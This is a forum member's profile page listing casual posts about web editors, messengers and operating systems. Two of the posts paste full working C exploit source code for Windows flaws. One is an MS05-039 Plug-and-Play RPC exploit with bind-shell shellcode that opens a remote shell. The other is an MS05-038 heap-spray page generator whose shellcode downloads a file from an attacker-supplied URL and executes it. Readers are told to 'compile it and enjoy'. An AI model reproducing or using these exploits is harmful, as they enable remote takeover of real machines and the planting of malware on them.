Jump to content
xisto Community

st4r-s4t

Members
  • Content Count

    15
  • Joined

  • Last visited

  1. i think if you want to build a site and you don`t know HTML (like me) you must use front page(xp or 2003),if you learned HTML alittle or very much you can use dreamwear,but if you learned HTML(php or asp...) well you can use notepad!!!so i use dreamwear beacause i know HTML a little , and it is good webdesign software!!exuse me because i can`t english better than it!!!!by
  2. This is the last version of yahoo messenger(not beta): Download Yahoo messenger final 7 by
  3. OH..................... My speed is very low i can`t tell you thanks for any things
  4. oh ok i am sory this is the new vuln of plug and play it`s name is: MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) I Sorry because i`m iranian and ican`t speak English very good!! I HOPE FOR ... by Notice from BuffaloHELP: Whenever you copy and paste from another souce you must place QUOTE tags. Source http://imp.ovh.net/fr/ Credit adjusted. Notice from Klass: User warned as verbal warn was given prior. Also next time you post Long Code use [codebox] [/codebox]tags
  5. This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ... /*Windows 2000 universal exploit for MS05-039-\x6d\x35\x6c\x30\x6e\x6e\x79-*/#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winnetwk.h>#include <winsock.h>#include <Rpc.h>#include <wchar.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")BYTE Data1[0x68] ={0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00, 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00, 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00, 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};struct DataStruct1{ BYTE SomeString[0x30]; DWORD RESDataType; DWORD LFD; DWORD SDM1; DWORD SDO; DWORD SDL; DWORD SDM2; BYTE SDA[0x07D0]; DWORD LRD; DWORD MB; DWORD DM;};struct RPCBIND{ BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; WORD MaxXmitFrag; WORD MaxRecvFrag; DWORD AssocGroup; BYTE NumCtxItems; WORD ContextID; WORD NumTransItems; GUID InterfaceUUID; WORD InterfaceVerMaj; WORD InterfaceVerMin; GUID TransferSyntax; DWORD SyntaxVer;};//from metasploit, before you were bornBYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c""\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32""\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07""\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24""\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8""\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64""\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e""\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53""\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4""\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9""\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d""\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51""\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54""\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff""\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a""\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55""\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c""\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10""\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff""\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3""\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55""\x04\x31\xdb\x53\xff\xd0"};BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};struct RPCFUNC{ BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; DWORD AllocHint; WORD ContextID; WORD Opnum;};BYTE POP[0x27] ={0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00, 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 0x05,0x08,0x00,0x00,0x41,0x00,0x41};int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){ BYTE rbuf[0x1000]; DWORD dw; struct RPCBIND RPCBind; memcpy(&RPCBind,&PRPC,sizeof(RPCBind)); UuidFromString(Interface,&RPCBind.InterfaceUUID); UuidToString(&RPCBind.InterfaceUUID,&Interface); RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]); RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]); TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL); return 0;}int Attack(HANDLE PipeHandle){ struct RPCFUNC RPCOP; int bwritten=0; BYTE *LargeBuffer; BYTE rbuf[0x100]; DWORD dw; struct DataStruct1 EvilRPC; memcpy(&EvilRPC,&Data1,sizeof(EvilRPC)); EvilRPC.SDL=0x07C0; memset(EvilRPC.SDA,0x90,0x07D0); EvilRPC.SDA[76]=0x3e; EvilRPC.SDA[77]=0x1e; EvilRPC.SDA[78]=0x02; EvilRPC.SDA[79]=0x75; memset(EvilRPC.SDA+80,0x90,10); EvilRPC.SDA[90]=0x90; memcpy(EvilRPC.SDA+94,BindShell,374); EvilRPC.MB=0x00000004; EvilRPC.DM=0x00000000; EvilRPC.LFD=0x000007E0; EvilRPC.LRD=0x000007E0; memcpy(&RPCOP,&POP,sizeof(RPCOP)); RPCOP.Opnum = 54; RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC); RPCOP.AllocHint=sizeof(EvilRPC); LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC)); memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC)); memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP)); memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC)); printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721"); TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL); free(LargeBuffer); return 0;}int main(int argc, char* argv[]){ char *server; NETRESOURCE nr; char unc[MAX_PATH]; char szPipe[MAX_PATH]; HANDLE hFile; if (argc < 2) { printf("Usage: %s <host>\n", argv[0]); return 1; } server=argv[1]; _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server); unc[sizeof(unc)-1] = 0; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpRemoteName = unc; nr.lpProvider = NULL; WNetAddConnection2(&nr, "", "", 0); _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server); hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0"); //SendMalformed RPC request Attack(hFile); return 0;} Notice from snlildude87: Credits adjusted.Remember to preview posts before posting to avoid something like this in the future Notice from cmatcmextra: [-codebox-] tags used instead. Should shorten the page size up ... a bit
  6. You can compile this code and enjoy it!! /*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11 http://http://www.donews.com/404.html zwell@sohu.comSome code belongs to Lion(cnhonker), regards to him.This code tested on Windows 2003-----------------------------------------------*/#include <stdio.h>#include <winsock2.h>#pragma comment(lib, "ws2_32")// Use for find the ASM code#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90#define PROC_END PROC_BEGIN#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"#define SEARCH_LEN 8#define MAX_SC_LEN 2048#define HASH_KEY 13// Define Decode Parameter#define DECODE_LEN 21#define SC_LEN_OFFSET 7#define ENC_KEY_OFFSET 11#define ENC_KEY 0xff// Define Function Addr#define ADDR_LoadLibraryA [esi]#define ADDR_GetSystemDirectoryA [esi+4]#define ADDR_WinExec [esi+8]#define ADDR_ExitProcess [esi+12]#define ADDR_URLDownloadToFileA [esi+16]// Need functionsunsigned char functions[100][128] ={ // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon 1 // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},};// Shellcode stringunsigned char sc[1024] = {0};unsigned int Sc_len;char *htmlbody1="<html><body>\r\n""<script language=\"javascript\">\r\n""shellcode = unescape(\"%u4343%u4343\"+\"";char *htmlbody2="\");\r\n""bigblock = unescape(\"%u0D0D%u0D0D\");\r\n""headersize = 20;\r\n""slackspace = headersize+shellcode.length;\r\n""while (bigblock.length<slackspace) bigblock+=bigblock;\r\n""fillblock = bigblock.substring(0, slackspace);\r\n""block = bigblock.substring(0, bigblock.length-slackspace);\r\n""while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n""memory = new Array();\r\n""for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n""</SCRIPT>\r\n""<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n""Ms05038 Exploit POC<br>\r\n""Made By ZwelL< http://http://www.donews.com/404.html ASM shellcode main functionvoid ShellCode();// Get function hashstatic DWORD __stdcall GetHash ( char *c ){ DWORD h = 0; while ( *c ) { __asm ror h, HASH_KEY h += *c++; } return( h );}int buildfile(unsigned char *sc, int len){ int i; char writebuf[4096]; char tmp[4096]; FILE *stream; memset(tmp, 0, 4096); memset(writebuf, 0, 4096); for(i = 0; i < len; i++) { sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff); } if(strlen(writebuf)%4!=0) strcat(writebuf, "00"); for(i=0; i<(strlen(writebuf)/4); i++) { strcat(tmp, "\%u"); strncat(tmp, &writebuf[i*4+2], 2); strncat(tmp, &writebuf[i*4], 2); } //printf("%s\n", writebuf); //printf("======================\n%s\n", tmp); if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL ) { fwrite(htmlbody1, strlen(htmlbody1), 1, stream); fwrite( tmp, strlen(tmp), 1, stream ); fwrite(htmlbody2, strlen(htmlbody2), 1, stream); fclose(stream); } else { printf("fopen wrong\n"); exit(0); } return 0;}void Make_ShellCode(char *url1){ unsigned char *pSc_addr; unsigned int Enc_key=ENC_KEY; unsigned long dwHash[100]; unsigned int dwHashSize; int i,j,k,l; // Get functions hash //printf("[+] Get functions hash strings.\r\n"); for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = GetHash((char*)functions[i]); //printf("\t%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_SC_LEN;++k ) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCode for (k=0;k<MAX_SC_LEN;++k) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } Sc_len=k; // Length of the ShellCode memcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[] // Add functions hash memcpy(sc+Sc_len, (char *)dwHash, dwHashSize); Sc_len += dwHashSize; // Add url memcpy(sc+Sc_len, url1, strlen(url1)+1); Sc_len += strlen(url1)+1; // Deal with find the right XOR byte for(i=0xff; i>0; i--) { l = 0; for(j=DECODE_LEN; j<Sc_len; j++) { if ( ((sc[j] ^ i) == 0x26) || //% ((sc[j] ^ i) == 0x3d) || //= ((sc[j] ^ i) == 0x3f) || //? ((sc[j] ^ i) == 0x40) || //@ ((sc[j] ^ i) == 0x00) || ((sc[j] ^ i) == 0x0D) || ((sc[j] ^ i) == 0x0A) ) // Define Bad Characters { l++; // If found the right XOR byte,l equals 0 break; }; } if (l==0) { Enc_key = i; //printf("[+] Find XOR Byte: 0x%02X\n", i); for(j=DECODE_LEN; j<Sc_len; j++) { sc[j] ^= Enc_key; } break; // If found the right XOR byte, Break } } // Deal with not found XOR byte if (l!=0) { printf("[-] No xor byte found!\r\n"); exit(-1); } // Deal with DeCode string *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len; *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key; printf("[+] download url:%s\n", url1);}int help(){ printf("Usage : ms05038.exe url [-t] \n"); printf(" the 't' option will let you test for the shellcode first\n"); exit(0);}void main(int argc, char **argv){ WSADATA wsa; unsigned char url[255]={0}; BOOL b_test; printf("\n========================================\n"); printf("Ms05-038 exploit POC\n"); printf("Write By Zwell\n"); printf("2005-8-11\n"); printf("http://http://www.donews.com/404.html;; printf("zwell@sohu.com\n"); printf("========================================\n\n"); b_test=FALSE; if(argc<2) help(); strncpy(url, argv[1], 255); if(argc == 3) if(!strcmp(argv[2], "-t")) b_test = TRUE; WSAStartup(MAKEWORD(2,2),&wsa); Make_ShellCode(url); printf("[+] Build shellcode successful\n"); buildfile(sc, Sc_len); printf("[+] Build file successful\n"); printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck \n"); if(b_test) { printf("Testing the shellcode...\n"); ((void (*)(void)) &sc)(); } return;}// ShellCode functionvoid ShellCode(){ __asm { PROC_BEGIN // C macro to begin proc//--------------------------------------------------------------------//// DeCode////-------------------------------------------------------------------- jmp short decode_enddecode_start: pop ebx // Decode start addr (esp -> ebx) dec ebx xor ecx,ecx mov cl,0xFF // Decode len decode_loop: xor byte ptr [ebx+ecx],ENC_KEY // Decode key loop decode_loop jmp short decode_okdecode_end: call decode_startdecode_ok://--------------------------------------------------------------------//// ShellCode////-------------------------------------------------------------------- jmp sc_endsc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push 4 pop ecx getkernel32: call GetProcAddress_fun loop getkernel32 // Get function addr of urlmon push 0x00006e6f push 0x6d6c7275 // urlmon push esp call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address/* push 1 pop ecx geturlmon: call GetProcAddress_fun loop geturlmon*/ call GetProcAddress_fun // url start addr = edi//LGetSystemDirectoryA: sub esp, 0x20 mov ebx, esp push 0x20 push ebx call ADDR_GetSystemDirectoryA // GetSystemDirectoryA//LURLDownloadToFileA: // eax = system path size // URLDownloadToFileA url save to a.exe mov dword ptr [ebx+eax], 0x652E615C // "\a.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax push eax push eax push ebx // %systemdir%\a.exe push edi // url push eax call ADDR_URLDownloadToFileA // URLDownloadToFileA//LWinExec: mov ebx, esp push eax push ebx call ADDR_WinExec // WinExec(%systemdir%\a.exe);Finished: //push 1 call ADDR_ExitProcess // ExitProcess();GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, HASH_KEY // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx retsc_end: call sc_start PROC_END //C macro to end proc }}
  7. You shoud learn C++ and Perl language (if you want agood hacker) and Network and know how compiling exploit and ...iranian boy
  8. hi i`m iranian and i try to make a php chat in my site i try to use PHPMYCHAT but it need php 3 and mySQL and... so i go here and post therefore i take ana accontbabay
  9. you can use remote desk top protocol )1433/tcp) to conect to other windows but it must on it and you must have a admin account.
  10. but some body do not know the linux and only think windows is only OS!!!!iranisan boy
  11. norton is good but symantec corporate 10 is the best!!!babayiranian boy
  12. i think windows is user friendlyer than linux but if sb wants to use profefesional from computer he must use linux (debian or suse or ....)babayiranian boy
×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.